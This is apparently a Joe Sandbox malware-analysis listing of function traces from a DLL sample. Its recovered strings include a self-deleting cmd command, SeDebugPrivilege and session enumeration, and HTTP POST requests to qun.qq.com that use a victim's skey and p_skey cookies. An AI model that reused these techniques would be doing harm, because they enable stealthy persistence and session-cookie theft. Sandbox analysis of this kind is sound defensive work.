                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$#823#825FolderPathSpecialstrchrwsprintf
                                                  • String ID: $ $ $%s\%s$.$.$C$C$D$D$GetPrivateProfileSectionNamesA$GetWindowsDirectoryA$KERNEL32.dll$M$M$N$N$S$a$a$a$a$a$a$b$b$b$b$c$c$c$c$c$c$d$e$e$e$e$e$e$e$e$f$f$g$h$h$i$i$i$i$i$i$k$k$k$k$k$k$kernel32.dll$lstrcatA$lstrcpyA$lstrlenA$m$p$p$p$p$p$p$r$r$r$r$r$r$s$s$s$s$s$s$s$s$u$w$w
                                                  • API String ID: 1413152188-1163569440
                                                  • Opcode ID: 6b0de1d9b4d272058180ea5e85739ea82220ea56e8af9adbbb86897ae75e66d6
                                                  • Instruction ID: 0562570b42432492150a784315d896445768f268a1e3393a75b37121b429ab9d
                                                  • Opcode Fuzzy Hash: 6b0de1d9b4d272058180ea5e85739ea82220ea56e8af9adbbb86897ae75e66d6
                                                  • Instruction Fuzzy Hash: E4D1B26140D7C0DDE322C778849878BBFD66FA2748F08498DE1C84B293C6BA9658C777
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                  • String ID: .$.$.$.$:$A$AOr$C$E$F$H$I$I$I$I$I$I$I$O$O$R$T$U$W$a$a$a$a$at.$b$c$d$d$d$g$i$i$i$l$l$l$l$l$l$l$l$m$n$n$n$n$n$n$n$n$n$n$n$n$o$o$p$p$p$p$p$p$p$r$r$r$r$r$t$t$t$t$t$t$t$t$t$t$t$t$t$t
                                                  • API String ID: 310444273-3809768815
                                                  • Opcode ID: 63e450fb999bb24abaee570fbd4232a6528e175d703855afcbb30a5378cb40b5
                                                  • Instruction ID: 4c56c63e57b0a57d431be2d6ff2093808df29b32732bb1a27d8720569643267d
                                                  • Opcode Fuzzy Hash: 63e450fb999bb24abaee570fbd4232a6528e175d703855afcbb30a5378cb40b5
                                                  • Instruction Fuzzy Hash: E9E1E42150D3C0DDE332C238844879FBFD65BA2648F48499DE5C84B293C7BA9558D77B
                                                  APIs
                                                    • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,755683C0,1001F1D6), ref: 1001B666
                                                    • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                    • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001ED7E
                                                  • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 1001EDBD
                                                  • GetCurrentProcess.KERNEL32 ref: 1001EEEB
                                                  • GetCurrentThread.KERNEL32 ref: 1001EEF2
                                                  • GetCurrentProcess.KERNEL32(00000020), ref: 1001EF67
                                                  • GetCurrentThread.KERNEL32 ref: 1001EF6E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Current$ModuleProcessThread$AddressEnvironmentFileHandleLibraryLoadNameProcVariable
                                                  • String ID: /c ping -n 2 127.0.0.1 > nul && del $ > nul$.$2$3$A$A$A$A$COMSPEC$D$F$K$L$N$P$P$R$R$S$T$T$a$a$a$b$c$d$d$d$h$h$i$i$i$i$l$l$l$m$m$o$o$r$r$r$r$r$r$r$s$s$s$s$s$s$t$t$t$t$t$t$t$u$u$y
                                                  • API String ID: 2038349478-1119942076
                                                  • Opcode ID: a4e3dd59c46a82729524982bfd22c579546c085d5377921feb853f5f94f67a7a
                                                  • Instruction ID: 4d007deb8cfa1c245ce4efd25164eff218471669c921604140f6b93309afb920
                                                  • Opcode Fuzzy Hash: a4e3dd59c46a82729524982bfd22c579546c085d5377921feb853f5f94f67a7a
                                                  • Instruction Fuzzy Hash: 2CE12A2150C7C089E326C6788449B9FFFD56BE2748F084A5DE2D84B2D2CAFA9548C777
                                                  APIs
                                                    • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                    • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                  • LocalAlloc.KERNEL32(00000040,00000400), ref: 10024C06
                                                  • WTSEnumerateSessionsA.WTSAPI32 ref: 10024C3B
                                                  • GetVersionExA.KERNEL32(?), ref: 10024C53
                                                    • Part of subcall function 10024A90: WTSQuerySessionInformationW.WTSAPI32 ref: 10024AB4
                                                    • Part of subcall function 10024A50: WTSQuerySessionInformationA.WTSAPI32(00000000,?,0000000A,?,?,10024ED1,?,?,?), ref: 10024A6F
                                                    • Part of subcall function 10024B40: WTSQuerySessionInformationA.WTSAPI32(00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024B60
                                                    • Part of subcall function 10024B40: WTSFreeMemory.WTSAPI32(?,00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024B80
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F03
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F25
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F31
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F3A
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F46
                                                  • LocalSize.KERNEL32(00000000), ref: 10024F54
                                                  • LocalReAlloc.KERNEL32(00000000,00000000,00000042,?,?,?,?), ref: 10024F62
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F73
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F91
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024FA7
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024FCF
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024FE5
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10025006
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 1002501C
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 1002503D
                                                  • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 100250A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Local$AllocInformationQuerySession$Process$CurrentEnumerateFreeMemoryOpenSessionsSizeTokenVersion
                                                  • String ID: AtR$C$C$D$D$I$I$LoSvAtR$Q$RDI$SeDebugPrivilege$SvAtR$c$c$c$c$d$d$d$i$i$i$l$n$n$n$n$n$n$n$n$o$o$o$o$r$s$t$t$t$t$u$v$w$w$y
                                                  • API String ID: 3275454331-1820797497
                                                  • Opcode ID: f5624e6b6a617209da6a5c80ef3033c770dc07205c0af6250f8b0743bed6d2d5
                                                  • Instruction ID: b1de97bb1e532192dcc96ff274dd48cc58c084c44de882cac167928afb279602
                                                  • Opcode Fuzzy Hash: f5624e6b6a617209da6a5c80ef3033c770dc07205c0af6250f8b0743bed6d2d5
                                                  • Instruction Fuzzy Hash: 83E1053050C3C1CEE325CB28C484B9FBBE1AB96708F48495DE5C857352DBBA9909CB67
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Exec
                                                  • String ID: &$&$&$&$/$/$1$2$3$4$5$6$:$a$a$a$a$a$c$c$d$d$d$g$g$g$g$i$i$i$l$l$m$n$n$n$n$o$o$o$p$r$r$r$r$r$u$u$u$u$u$u$v$y
                                                  • API String ID: 459137531-3041118241
                                                  • Opcode ID: b22cca66343ad3003d2291dea90512d45e7e4697c411a4a85f85a143834da450
                                                  • Instruction ID: 7bc06bb267aba25a745494efeaf4f4d644bd4b710169c1d4aeb2a62eee067a6f
                                                  • Opcode Fuzzy Hash: b22cca66343ad3003d2291dea90512d45e7e4697c411a4a85f85a143834da450
                                                  • Instruction Fuzzy Hash: 08510C2554E3C1DDE312C668918878FEFD21FB7648E48598DB1C81B393C2AA825CC777
                                                  APIs
                                                  • LoadLibraryA.KERNEL32 ref: 1000FC8C
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000FC95
                                                  • LoadLibraryA.KERNEL32(?,.23L), ref: 1000FCDE
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000FCE1
                                                  • GetTickCount.KERNEL32 ref: 1000FD3E
                                                  • sprintf.MSVCRT ref: 1000FD4F
                                                  • GetTickCount.KERNEL32 ref: 1000FD8C
                                                  • sprintf.MSVCRT ref: 1000FD9D
                                                  • lstrcatA.KERNEL32(?,?), ref: 1000FDB3
                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000FE19
                                                  • CloseHandle.KERNEL32(00000000), ref: 1000FE20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressCountLibraryLoadProcTicksprintf$CloseFileHandleWritelstrcat
                                                  • String ID: .$.23L$2$3$A$A$C$F$G$K$L$N$P$P$R$T$a$a$d$e$e$e$e$e$e$g$h$i$igu$m$n$o$p$p$r$s$t$t$t$u
                                                  • API String ID: 3729143920-1829843242
                                                  • Opcode ID: dcacbf2d7880bdb81e6970219c1f5e7ef38ce43c11cac9833ec278a6e35b28e2
                                                  • Instruction ID: d244896b57f471f380d1962a39cc29ca1bd9ae2e541eca84f9856bfdb779ca2f
                                                  • Opcode Fuzzy Hash: dcacbf2d7880bdb81e6970219c1f5e7ef38ce43c11cac9833ec278a6e35b28e2
                                                  • Instruction Fuzzy Hash: C1916C3110C3C09AE312CB68D848B9BBFD5ABA6718F084A5DF6D4462D2D7BA950CC773
                                                  APIs
                                                  • strstr.MSVCRT ref: 10013BB7
                                                  • strstr.MSVCRT ref: 10013BCA
                                                  • strstr.MSVCRT ref: 10013BDF
                                                  • strncpy.MSVCRT ref: 10013C2B
                                                  • _itoa.MSVCRT ref: 10013C71
                                                  • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 10013C8A
                                                  • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 10013CB0
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013CBD
                                                  • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,80084010,00000000), ref: 10013CED
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013D00
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013D03
                                                  • sprintf.MSVCRT ref: 10013D2E
                                                  • HttpSendRequestA.WININET(00000000,?,?,?), ref: 10013D66
                                                  • HttpQueryInfoA.WININET(00000000,00000005,?,?,00000000), ref: 10013D82
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013D93
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013D96
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013D99
                                                  • atol.MSVCRT ref: 10013DB2
                                                  • #823.MFC42(00000001,?,?), ref: 10013DC0
                                                  • InternetReadFile.WININET(00000000,00000000,00000001,?), ref: 10013DE8
                                                  • #825.MFC42(00000000), ref: 10013DF3
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013E02
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013E05
                                                  • InternetCloseHandle.WININET(?), ref: 10013E0C
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013E24
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013E27
                                                  • InternetCloseHandle.WININET(?), ref: 10013E2E
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 10013E3E
                                                  • #823.MFC42(00000002), ref: 10013E4B
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 10013E75
                                                  • #825.MFC42(00000000), ref: 10013E7C
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 10013E93
                                                  • #823.MFC42(00000001), ref: 10013E9F
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 10013ECA
                                                  • #825.MFC42(00000000), ref: 10013ED1
                                                  • #825.MFC42(00000000,00000000,00000000), ref: 10013EDF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandle$#825ByteCharMultiWide$#823Httpstrstr$OpenRequest$ConnectFileInfoQueryReadSend_itoaatolsprintfstrncpy
                                                  • String ID: $/cgi-bin/qun_mgr/get_group_list$Accept: */*Referer: http://qun.qq.com%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s$HTTP/1.1$Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)$POST$bkn=$create$gc=%u&st=0&end=1999&sort=0&%s$gmr$join$p_skey$qun.qq.com$skey=
                                                  • API String ID: 3684279964-3639289013
                                                  • Opcode ID: 990525e5488a96e8453cdc46b1721a0efc440dc8632db5c924d2235e82eb403e
                                                  • Instruction ID: faa93913a6112bf75685c4331b660b6eedd4284dd9d5a7e5e4bfb64d0fa1d1b7
                                                  • Opcode Fuzzy Hash: 990525e5488a96e8453cdc46b1721a0efc440dc8632db5c924d2235e82eb403e
                                                  • Instruction Fuzzy Hash: 97D14876A043142BE310DA689C81FAB77DDEB84760F05463DFB09A72C1EB74ED0587A6
                                                  APIs
                                                  • #356.MFC42 ref: 10007AA2
                                                  • #540.MFC42 ref: 10007AB6
                                                  • #540.MFC42 ref: 10007AC7
                                                  • #540.MFC42 ref: 10007AD8
                                                  • #540.MFC42 ref: 10007AE9
                                                    • Part of subcall function 10008080: #2614.MFC42(?,?,10007AFF), ref: 10008084
                                                    • Part of subcall function 10008080: #860.MFC42(*.*,?,?,10007AFF), ref: 10008091
                                                    • Part of subcall function 10008080: #3811.MFC42(?,*.*,?,?,10007AFF), ref: 100080B2
                                                    • Part of subcall function 10008080: #3811.MFC42(?,?,*.*,?,?,10007AFF), ref: 100080C1
                                                    • Part of subcall function 10008080: #3811.MFC42(?,?,?,*.*,?,?,10007AFF), ref: 100080D0
                                                    • Part of subcall function 10008080: #3811.MFC42(?,?,?,?,*.*,?,?,10007AFF), ref: 100080DF
                                                    • Part of subcall function 10008080: #3811.MFC42(?,?,?,?,?,*.*,?,?,10007AFF), ref: 100080EE
                                                    • Part of subcall function 10008080: #3811.MFC42(?,?,?,?,?,?,*.*,?,?,10007AFF), ref: 100080FD
                                                    • Part of subcall function 10011E20: #537.MFC42(?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E47
                                                    • Part of subcall function 10011E20: #940.MFC42(?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E7E
                                                    • Part of subcall function 10011E20: #535.MFC42(?,?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E8F
                                                    • Part of subcall function 10011E20: #800.MFC42(?,?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011EA5
                                                  • #858.MFC42 ref: 10007B2F
                                                  • #800.MFC42 ref: 10007B40
                                                  • #537.MFC42(*.*), ref: 10007B59
                                                  • #922.MFC42(?,?,00000000,*.*), ref: 10007B6E
                                                  • #858.MFC42(00000000,?,?,00000000,*.*), ref: 10007B80
                                                  • #800.MFC42(00000000,?,?,00000000,*.*), ref: 10007B90
                                                  • #800.MFC42(00000000,?,?,00000000,*.*), ref: 10007BA1
                                                  • #2770.MFC42(?,00000000,00000000,?,?,00000000,*.*), ref: 10007BB1
                                                  • #2781.MFC42(?,00000000,00000000,?,?,00000000,*.*), ref: 10007BCF
                                                  • #4058.MFC42 ref: 10007BEF
                                                  • #858.MFC42(?), ref: 10007C01
                                                  • #858.MFC42(?,?), ref: 10007C0E
                                                  • #858.MFC42(?,?,?), ref: 10007C1B
                                                  • #3178.MFC42(?,?,?,?), ref: 10007C8A
                                                  • #922.MFC42(?,?,00000000,?,?,?,?), ref: 10007C9D
                                                  • #858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 10007CAF
                                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 10007CBF
                                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 10007CD0
                                                  • #1980.MFC42 ref: 10007CED
                                                  • #858.MFC42(?), ref: 10007CF6
                                                  • MessageBoxA.USER32(00000000,100FA624,warning,00000000), ref: 10007D1E
                                                  • #922.MFC42(?,?,?), ref: 10007D2E
                                                  • #858.MFC42(00000000,?,?,?), ref: 10007D40
                                                  • #800.MFC42(00000000,?,?,?), ref: 10007D51
                                                  • #2770.MFC42(?,00000000,00000000,?,?,?), ref: 10007D61
                                                  • #2781.MFC42(?,00000000,00000000,?,?,?), ref: 10007D7F
                                                  • #4058.MFC42(?,00000000,00000000,?,?,?), ref: 10007D8C
                                                  • #4215.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007DAD
                                                  • #3324.MFC42(?,00000000,00000000,?,?,?), ref: 10007DC6
                                                  • #3324.MFC42(?,00000000,00000000,?,?,?), ref: 10007DE7
                                                  • #3310.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007E22
                                                  • #3010.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007E7F
                                                  • #3304.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007ED4
                                                  • #3181.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007F33
                                                  • #800.MFC42(?,?,?,?,00000000,00000000,?,?,?), ref: 10007F58
                                                  • #3181.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007F6A
                                                  • #941.MFC42(100FA614), ref: 10007F91
                                                  • #6883.MFC42(?,?), ref: 10007FA2
                                                  • #800.MFC42(?,?), ref: 10007FB3
                                                  • MessageBoxA.USER32(00000000,100FA624,warning,00000000), ref: 10007FE1
                                                  • #800.MFC42 ref: 10008015
                                                  • #800.MFC42 ref: 10008026
                                                  • #800.MFC42 ref: 10008037
                                                  • #800.MFC42 ref: 10008048
                                                  • #668.MFC42 ref: 1000805C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #800$#858$#3811$#540$#922$#2770#2781#3181#3324#4058#537Message$#1980#2614#3010#3178#3304#3310#356#4215#535#668#6883#860#940#941
                                                  • String ID: *.*$warning
                                                  • API String ID: 3130606840-3923866357
                                                  • Opcode ID: 251ad2f11a4f3d366ba395f991fd5f89db86f2f297839ac524b49303de88fe60
                                                  • Instruction ID: b1e61bf16f4b2c14380c5a5ce74a3a62fa832d31a0b46feb69f6aa117d284303
                                                  • Opcode Fuzzy Hash: 251ad2f11a4f3d366ba395f991fd5f89db86f2f297839ac524b49303de88fe60
                                                  • Instruction Fuzzy Hash: 42027F745083858BD354CF64C941FABBBE5FF98684F40492CF9DA43296EB34E909CB62
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
